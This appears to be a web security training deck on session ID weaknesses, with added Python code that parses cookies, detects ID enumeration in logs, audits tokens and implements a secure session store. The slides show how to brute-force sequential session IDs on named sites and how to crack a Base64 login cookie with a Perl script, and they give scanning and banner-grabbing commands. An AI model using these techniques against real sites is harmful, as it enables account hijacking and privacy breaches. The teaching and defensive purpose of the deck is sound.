2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.
3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.
4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.
5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals the browser to store the cookie only in memory; it will be erased when the browser is closed. (1154029490 expires July 27, 2006.)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480).

Cookie Stored Session ID Examples

.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2
.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2
.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034
.ebay.com TRUE / FALSE 1183296824 lucky8 694036
.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437
.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com TRUE / FALSE 1154029490 PU t=1
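A parser for the seven-field cookies.txt layout just described, added here as an example and not part of the slides. The sample text is the set of lines printed above (space-separated, as on the slides; real files are tab-separated and the parser accepts both). Beyond splitting fields it answers the two questions a reviewer asks of a cookie jar: when does each session ID expire, and which of them will the browser hand over in cleartext because the secure flag is off:

```python
from datetime import datetime, timezone

# Lines copied from the slides above, in Netscape cookies.txt layout.
SAMPLE_COOKIES_TXT = """\
www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480
.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2
.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034
.ebay.com TRUE / FALSE 1183296824 lucky8 694036
.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437
"""

FIELDS = ("domain", "flag", "path", "secure", "expires", "name", "value")


def parse_cookies_txt(text):
    """Parse cookies.txt lines into dicts keyed by the seven field names.
    Blank lines and '#' comments are skipped; the value field may contain
    whitespace, so the line is split at most six times."""
    cookies = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) != 7:
            raise ValueError(f"malformed cookie line: {line!r}")
        cookie = dict(zip(FIELDS, parts))
        cookie["flag"] = cookie["flag"].upper() == "TRUE"      # readable by every host in the domain
        cookie["secure"] = cookie["secure"].upper() == "TRUE"  # sent only over SSL
        cookie["expires"] = int(cookie["expires"])             # Unix time
        cookies.append(cookie)
    return cookies


def expires_utc(cookie):
    """Expiry of a persistent cookie as an aware UTC datetime."""
    return datetime.fromtimestamp(cookie["expires"], tz=timezone.utc)


def cleartext_exposed(cookies):
    """Names of cookies the browser will send over plain HTTP (secure flag off).
    Anyone sniffing the path gets the session ID without touching the server."""
    return [c["name"] for c in cookies if not c["secure"]]


def domain_wide(cookies):
    """Names of cookies every machine in the domain can read (flag TRUE):
    one compromised host in the domain is enough to collect them."""
    return [c["name"] for c in cookies if c["flag"]]


if __name__ == "__main__":
    jar = parse_cookies_txt(SAMPLE_COOKIES_TXT)
    for c in jar:
        print(f"{c['domain']:16s} {c['name']:14s} expires {expires_utc(c):%Y-%m-%d} secure={c['secure']}")
    print("sent in cleartext:", cleartext_exposed(jar))
    print("domain-wide:      ", domain_wide(jar))
```

Every session ID on the slide is sent in cleartext, which is why the slides later note that server-side SSL alone does nothing for session security: the flag that keeps the cookie off the wire has to be set by the application.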

URL Stored Session ID

• http://www.123greetings.com/view/7AD30725122120803
• http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB
• http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJ
• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344

Session IDs in HTML Hidden Fields

<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">
<input type="hidden" name="sessionID" value="abcde1234">
<input type="hidden" name="useraccount" value="673-12745">
<input type="submit" name="Access My Bank Information">
</form>

Session ID Security Overview

Session ID security is a microcosm of Web Application Security.

Web Application Security cuts through many different aspects of an organization’s information security infrastructure

An Example: Brute Forcing Session An Example: Brute Forcing Session ID’s in URLSID’s in URLS

Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. --------Method 1-------- Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.) 

http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html

An Example: Brute Forcing Session IDs in URLs

http://www.123greetings.com/view/AD30725122116211

http://www.123greetings.com/view/AD30725122118909

http://www.123greetings.com/view/AD30725122120803

http://www.123greetings.com/view/AD30725122122507

http://www.123greetings.com/view/AD30725122124100

Once we associate the date on which we sent these electronic cards, July 25 at 12:21 PST, with the ID, we can eliminate still more entropy from this session ID (07251221). Notice that we are then left with only five incrementing "random" digits at the end of the URL.

An Example: Brute Forcing Session IDs in URLs – Automated Demo!

Why Brute Forcing Web Session IDs is Bad

• Can result in an online user's web application account being hijacked, or in loss of privacy

• Easy to exploit

• Unlike a typical login scenario, there is no failed-login lockout

• Prevalent disclosure among security mailing lists

• Typical security solutions (firewalls, IDS, etc.) do nothing to detect these attacks

• Log data is usually not that detailed

• IDS is not well developed for web application attacks

• SSL (server side) does nothing to protect against these attacks
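The slide notes that firewalls and IDS do nothing against session ID guessing and that web logs are rarely detailed. Most web servers do, however, record the client address and the full request target, which is enough to spot the walk through consecutive IDs that the Dfilm and Sendomatic slides show. The following detector is an added example and not part of the original deck; the log lines are constructed in Common Log Format using documentation IP ranges, and the thresholds (five distinct IDs, gaps of at most 2, 80% adjacent) are assumptions to tune per site.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines in Common Log Format. One client walks
# consecutive ids the way the Dfilm/Sendomatic slides show; the other two
# clients fetch single, unrelated ids. Addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2002:13:40:01 -0400] "GET /mm2s/mm_route.php?id=110532 HTTP/1.0" 200 5120
198.51.100.2 - - [01/Jul/2002:13:40:02 -0400] "GET /mm2s/mm_route.php?id=984417 HTTP/1.0" 200 4871
203.0.113.7 - - [01/Jul/2002:13:40:02 -0400] "GET /mm2s/mm_route.php?id=110531 HTTP/1.0" 200 5002
203.0.113.7 - - [01/Jul/2002:13:40:03 -0400] "GET /mm2s/mm_route.php?id=110530 HTTP/1.0" 200 4990
203.0.113.7 - - [01/Jul/2002:13:40:03 -0400] "GET /mm2s/mm_route.php?id=110529 HTTP/1.0" 200 5111
198.51.100.9 - - [01/Jul/2002:13:40:04 -0400] "GET /mm2s/mm_route.php?id=551203 HTTP/1.0" 200 4600
203.0.113.7 - - [01/Jul/2002:13:40:04 -0400] "GET /mm2s/mm_route.php?id=110528 HTTP/1.0" 200 5090
203.0.113.7 - - [01/Jul/2002:13:40:05 -0400] "GET /mm2s/mm_route.php?id=110527 HTTP/1.0" 200 5011
203.0.113.7 - - [01/Jul/2002:13:40:05 -0400] "GET /mm2s/mm_route.php?id=110526 HTTP/1.0" 200 5079
198.51.100.2 - - [01/Jul/2002:13:40:06 -0400] "GET /mm2s/mm_route.php?id=984417 HTTP/1.0" 200 4871
"""

# Client address and request target out of a CLF line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A run of five or more digits anywhere in the path or query string.
ID_RE = re.compile(r"\d{5,}")


def extract_ids(log_text):
    """Yield (client_ip, numeric_id) for every request carrying a numeric id."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        runs = ID_RE.findall(m.group("target"))
        if runs:
            # Take the last run so a date-like prefix in the path is ignored.
            yield m.group("ip"), int(runs[-1])


def find_enumeration(log_text, min_distinct=5, max_gap=2, min_adjacent_ratio=0.8):
    """Flag clients that fetched many distinct ids that sit next to each other.

    A real user follows one link; a client requesting id, id+1, id+2, ... in a
    short window is enumerating. Returns {ip: {"distinct", "adjacent_ratio",
    "range"}} for flagged clients only. Thresholds are assumptions to tune.
    """
    seen = defaultdict(set)
    for ip, ident in extract_ids(log_text):
        seen[ip].add(ident)

    flagged = {}
    for ip, ids in seen.items():
        if len(ids) < min_distinct:
            continue
        ordered = sorted(ids)
        gaps = [b - a for a, b in zip(ordered, ordered[1:])]
        ratio = sum(1 for g in gaps if g <= max_gap) / len(gaps)
        if ratio >= min_adjacent_ratio:
            flagged[ip] = {
                "distinct": len(ids),
                "adjacent_ratio": ratio,
                "range": (ordered[0], ordered[-1]),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {info['distinct']} ids, {info['range'][0]}..{info['range'][1]}")
```

The same rule expressed as a SIEM query (count of distinct IDs per client per minute, then the spread between min and max) catches the sequential case; IDs drawn from a proper random generator give a large spread for any client, which is the other reason to fix the generator.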

In the News

– "Privacy hole found in Verizon Wireless Web site", Computerworld, Sept 6, 2001.
http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
http://online.securityfocus.com/archive/1/211520

– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION

URL Example: Brute Forcing Register.com

Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below.

http://mydomain.register.com/change_password.cgi?155218782787

Note: Above link will expire within three days

Example 2: Brute Forcing Web Session IDs

http://mydomain.register.com/change_password.cgi?486218782865

http://mydomain.register.com/change_password.cgi?440218782891

http://mydomain.register.com/change_password.cgi?685218782917

http://mydomain.register.com/change_password.cgi?505218782956

http://mydomain.register.com/change_password.cgi?435218782969

URL Example – Brute Forcing Dfilm.com

-----Original Message-----

From: test@test.com [mailto:test@test.com]

Sent: Monday, July 01, 2002 1:38 PM

To: dendler@idefense.com

Subject: D.FILM Digital Movie for Dave

Dave created a digital movie for you!

You can view it at the following URL:

http://mm.dfilm.com/mm2s/mm_route.php?id=110532

Cheers,

Dave and DFILM.

Be sure to check out the web site at http://www.dfilm.com

URL Example – Brute Forcing Dfilm.com

No privacy for other users' creations:

http://mm.dfilm.com/mm2s/mm_route.php?id=110532

http://mm.dfilm.com/mm2s/mm_route.php?id=110531

http://mm.dfilm.com/mm2s/mm_route.php?id=110530

http://mm.dfilm.com/mm2s/mm_route.php?id=110529

http://mm.dfilm.com/mm2s/mm_route.php?id=110528

http://mm.dfilm.com/mm2s/mm_route.php?id=110527

http://mm.dfilm.com/mm2s/mm_route.php?id=110526

http://mm.dfilm.com/mm2s/mm_route.php?id=…

URL Example – Sendomatic.com

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330

URL Example – Sendomatic.com

View other people's events: crash a party, edit an event, cancel an event, etc.

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335

http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336

http://www.sendomatic.com/servlets/servlets/mysendo?uId=…

Cookie Example – Freeservers.com

• LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;

• Base64-decode the string: http://www.securitystats.com/tools/base64.asp

testing123.itgo.com:1231234 (username:password)

• Next, automate it with a Perl exploit by feeding encoded strings into the cookie

Cookie Example – Freeservers.com

% perl freeservershack.pl
trying test
trying test123
trying 123123
trying 1231234
Cracked it! The password to testing123.itgo.com is 1231234

GET http://testing123.itgo.com/cgi-bin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)
Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D
Cookie2: $Version=1
%

Cookie Example – Freeservers.com

• Or a much longer way: use the brute forcer on every single cookie character combination
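The two cookie and URL cases above (the Freeservers LOGIN cookie that is just Base64 of username:password, and the 123greetings IDs whose date prefix leaves only five varying digits) are the checks a developer or auditor should run against their own application's tokens before an outsider does. This auditor is an added example and not part of the deck or of the Session Auditor tool it lists; the token values are copied from the slides, and the function names and the "one or more printable ASCII characters with a single colon" heuristic for a credential leak are my assumptions.

```python
import base64
import binascii
import math
import os
from datetime import datetime
from urllib.parse import unquote

# Values copied from the slides: the Freeservers LOGIN cookie and five
# 123greetings card ids issued within a few minutes of each other.
LOGIN_COOKIE = "dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0"
GREETING_IDS = [
    "AD30725122116211",
    "AD30725122118909",
    "AD30725122120803",
    "AD30725122122507",
    "AD30725122124100",
]
# Send time stated on the slide: July 25, 12:21 (year assumed).
GREETING_ISSUED_AT = datetime(2002, 7, 25, 12, 21)


def decode_if_text(token):
    """Return the decoded string if the token is Base64 of printable ASCII,
    else None. URL-decodes first so a %3D padding sign is handled."""
    raw = unquote(token).strip(";")
    raw += "=" * (-len(raw) % 4)  # restore padding that clients often strip
    try:
        data = base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not data or any(b < 0x20 or b > 0x7E for b in data):
        return None
    return data.decode("ascii")


def credential_leak(token):
    """True when the decoded token looks like 'identity:secret' (assumed heuristic)."""
    text = decode_if_text(token)
    return text is not None and text.count(":") == 1 and all(text.split(":"))


def embedded_timestamp(token, issued_at):
    """Position of the issue time (MMDDhhmm) inside the token, or -1 if absent."""
    return token.find(issued_at.strftime("%m%d%H%M"))


def effective_keyspace(tokens):
    """Split a batch of tokens issued close together into the part they share
    and the part that varies, and size the varying part in bits. Someone who
    holds one token only has to guess the varying part."""
    prefix = os.path.commonprefix(tokens)
    n = len(tokens[0]) - len(prefix)
    suffixes = [t[len(prefix):] for t in tokens]
    alphabet = 10 if all(s.isdigit() for s in suffixes) else 36  # digits vs. alphanumeric
    return prefix, n, n * math.log2(alphabet)


def audit(tokens, issued_at=None):
    """Summarise the weaknesses a batch of session tokens exhibits."""
    report = {"credential_leak": any(credential_leak(t) for t in tokens)}
    if issued_at is not None:
        report["timestamp_at"] = embedded_timestamp(tokens[0], issued_at)
    prefix, n, bits = effective_keyspace(tokens)
    report.update(shared_prefix=prefix, varying_chars=n, bits=round(bits, 1))
    return report


if __name__ == "__main__":
    print(audit([LOGIN_COOKIE]))
    print(audit(GREETING_IDS, issued_at=GREETING_ISSUED_AT))
```

For the greeting IDs the shared prefix is eleven characters and five digits vary, about 16.6 bits; a token that had to be guessed from scratch would offer nothing to share and no timestamp to find, which is what the "6 Common Problems" slides below ask for.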

Cookie/URL Example – Amazon.com

• Some sites use the URL AND Cookie for authentication:

6 Common Problems

• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.

• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.  

• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string's key space is not sufficiently large.

6 Common Problems – Continued

• Indefinite Expiration on Server – Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.

• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers.

• Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.
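The first four of the six problems (weak algorithm, no lockout, short key space, indefinite expiration) are all fixed on the server side, in how IDs are generated and stored. The code below is an added example, not from the deck: it shows the timestamp-plus-counter pattern the slides criticise next to a generator that draws 256 random bits from the OS, and a session table with an absolute lifetime, a per-client throttle on lookups of unknown IDs, and hashed storage of the token. The class, its parameters and the thresholds are assumptions; the clear-text transmission and insecure-retrieval problems need HTTPS and cookie attributes on top of this.

```python
import hashlib
import secrets
import time


def weak_session_id(issued_at, counter):
    """The pattern the slides warn about: a timestamp plus a small counter.
    Anyone holding one id knows the next one to within a few digits."""
    return f"{int(issued_at):010d}{counter:05d}"


def secure_session_id():
    """256 random bits from the OS CSPRNG, URL-safe; nothing to predict."""
    return secrets.token_urlsafe(32)


class SessionStore:
    """Server-side session table (assumed design, not a specific product).

    Tokens are stored hashed, so a copy of the table does not hand out live
    sessions. Sessions have an absolute lifetime. Lookups of unknown tokens
    are counted per client and the client is refused for a while once it
    exceeds the limit, which is the lockout that session guessing normally
    lacks. Time is passed in explicitly so behaviour is testable."""

    def __init__(self, ttl_seconds=900, max_failed_lookups=5, lockout_seconds=900):
        self.ttl = ttl_seconds
        self.max_failed = max_failed_lookups
        self.lockout = lockout_seconds
        self._sessions = {}      # sha256(token) -> (user, expires_at)
        self._failures = {}      # client -> consecutive unknown-token lookups
        self._locked_until = {}  # client -> time at which the lockout ends

    @staticmethod
    def _key(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def create(self, user, now=None):
        now = time.time() if now is None else now
        token = secure_session_id()
        self._sessions[self._key(token)] = (user, now + self.ttl)
        return token

    def lookup(self, token, client, now=None):
        """Return the user for a live token, or None. An expired token is
        dropped; an unknown one counts against the client."""
        now = time.time() if now is None else now
        if self._locked_until.get(client, 0) > now:
            return None
        key = self._key(token)
        entry = self._sessions.get(key)
        if entry is not None:
            user, expires_at = entry
            if now < expires_at:
                self._failures.pop(client, None)
                return user
            del self._sessions[key]  # expired: remove server-side
            return None
        failures = self._failures.get(client, 0) + 1
        self._failures[client] = failures
        if failures >= self.max_failed:
            self._locked_until[client] = now + self.lockout
            self._failures.pop(client, None)
        return None

    def destroy(self, token):
        """Logout must invalidate server-side, not just clear the cookie."""
        self._sessions.pop(self._key(token), None)
```

The lockout key here is the client address; behind a shared proxy a per-account or global unknown-token rate limit is the usual complement, since the slide on proxies notes that addresses are not reliable.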

Tools

• Sessions Auditor – www.idefense.com/idtools/Session_Auditor.zip

• Visual Testing – WebSleuth – www.geocities.com/dzzie/sleuth

• WebProxy – www.atstake.com/research/tools/index.html

• HTTPush – httpush.sourceforge.net

• Achilles – www.digizen-security.com/downloads.html

• MiniBrowser – aignes.com/download.htm

• Some good things:
– Completeness
– Large knowledge bases (at least possibly)

• Puts web security assessment into the hands of anyone who calls themselves an "Information Security Expert".

Why Automated Tools Don't Work Very Well

• Every programmer does things a little differently

• Authentication schemes are hard to automate

• Error codes are not standardized

• Sometimes simple things like SSL get in the way

Why People are Better

• Recognition of subtle errors

• We understand the impact and therefore the risk of a vulnerability

• We are grounded in the fundamentals of Computer Science and therefore are able to find "real" bugs and flaws in logic

Web Hacking Accessories

• Some helpful tools include…
– A port scanner (Nmap et al.): www.insecure.org/nmap/
– Netcat, the network Swiss army knife: http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner, e.g. Whisker: http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– OpenSSL source and documentation: OpenSSL, RFC 2246

New tools on the horizon…

• Nikto – CGI scanner, similar to Whisker 1.4. Checks for CGIs, common dirs, and old versions; database frequently updated. http://www.cirt.net/

• WHArsenal – Set of CGIs that plug into an existing Apache install. Allows for all kinds of requests while controlling/modifying request particulars. http://community.whitehatsec.com/

• @stake WebProxy – Assessment proxy with full fuzzer/rewriting capabilities. Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/

• Nessus – Has a few new interesting web assessment plugins which do site crawling/mirroring and a few other interesting things. http://www.nessus.org/

Basic Training for Web Combat…

• Port scanning
– Look for well-known TCP web ports: 80, 81, 443, 8000, 8080, etc.

– Using FScan (from Foundstone):
fscan -p 80,81,443,8000,8080 10.0.0.1

– Using nmap (by Fyodor):
nmap -p 80,81,443,8000,8080 10.0.0.1

Basic Training for Web Combat…

• Fingerprinting – HTTP banner grabbing
– netcat as a TCP client (even telnet works):
nc 10.0.0.1 80
HEAD / HTTP/1.0

• Advanced HTTP methods: TRACE, OPTIONS, etc.
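The netcat session above is a manual HEAD request; the same exchange in code lets a server owner check routinely what their own server announces in the Server header and whether TRACE is answered. This is an added example, not from the deck: it speaks raw HTTP/1.0 over a socket exactly as the nc/HEAD lines do, and instead of the 10.0.0.1 target it starts a local stand-in server (constructed, banner "TestServer/1.0") so it runs offline. The helper names are my own.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def http_probe(host, port, method, path="/", timeout=5.0):
    """Send one HTTP/1.0 request the way the nc/HEAD slide does and return
    (status_code, headers). HTTP/1.0 makes the server close the connection,
    so reading until EOF yields the whole response."""
    request = f"{method} {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        raw = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def fingerprint(host, port):
    """Owner's check: what does the server disclose, and does it honour TRACE?
    A TRACE answered with 2xx means the method is enabled."""
    head_status, headers = http_probe(host, port, "HEAD")
    trace_status, _ = http_probe(host, port, "TRACE")
    return {
        "server_banner": headers.get("server", ""),
        "head_status": head_status,
        "trace_enabled": 200 <= trace_status < 300,
    }


class _StandInHandler(BaseHTTPRequestHandler):
    """Constructed local server in place of the 10.0.0.1 target. It answers
    HEAD and, like the stdlib default, rejects TRACE with 501."""
    server_version = "TestServer/1.0"
    sys_version = ""  # drop the "Python/x.y" suffix from the Server header

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def run_against_local_server():
    """Start the stand-in on a free loopback port, probe it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), _StandInHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        return fingerprint("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_against_local_server())
```

Point `fingerprint` at a host and port you administer to confirm the banner has been minimised (ServerTokens Prod on Apache, for instance) and that TRACE is off; both are configuration items the "Root Causes" slides at the end attribute to oversight.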

Basic Training for Web Combat…

Shaking the tree for the low-hanging fruit…

• Scan using a database of known web vulnerabilities.

• Whisker (by Rain Forest Puppy):
./whisker.pl -h 10.0.0.1 -I 1

• cgichk.c:
<snip>
"GET /cgi-bin/phf HTTP/1.0\n\n";
"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
"GET /cgi-bin/test-cgi HTTP/1.0\n\n";
"GET /cgi-bin/php.cgi HTTP/1.0\n\n";

• ISS, Cybercop, Retina, etc.

el33t hax0r Training for Web Combat…

What about SSL?

• Some SSL myths:
– "We are secure because we use SSL!"
– "Strong 128-bit crypto is being used"
– "We use digital certificates signed by VeriSign"

Proxy Over SSL

• Using netcat and OpenSSL, it is possible to create a simple two-line SSL proxy!

• Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.

[Diagram: web client → nc → openssl → SSL web server]

Assessment Tools

• Vulnerability scanners
– Look for a known list of vulnerable applications or technologies
– Do not (cannot) engage/scan custom applications and configurations
– General vulnerability scanners: ISS, Cybercop, Nessus
– Web-specific vulnerability scanners: WebInspect, Whisker

Assessment Tools

• 'Proxy monitors'
– HTTP proxy which monitors traffic, looking for web vulnerabilities as they pass
– Can analyze custom applications with the help of a user
– Examples: AppScan, RFProxy, HTTPush, Achilles

Root Causes of Web Hacks

• Complex web architectures may cause oversight in web server configuration.

• URL parsing.

• File canonicalization.

• Combination of underlying operating system and web server may leave holes.

Root Causes of Web Hacks

• Untested code used in web applications, to save time.

• Level of security consciousness is low among web application developers.

• Security vs. convenience.

• Security vs. time-to-market.

• Zero-knowledge administration breeds zero-knowledge administrators.
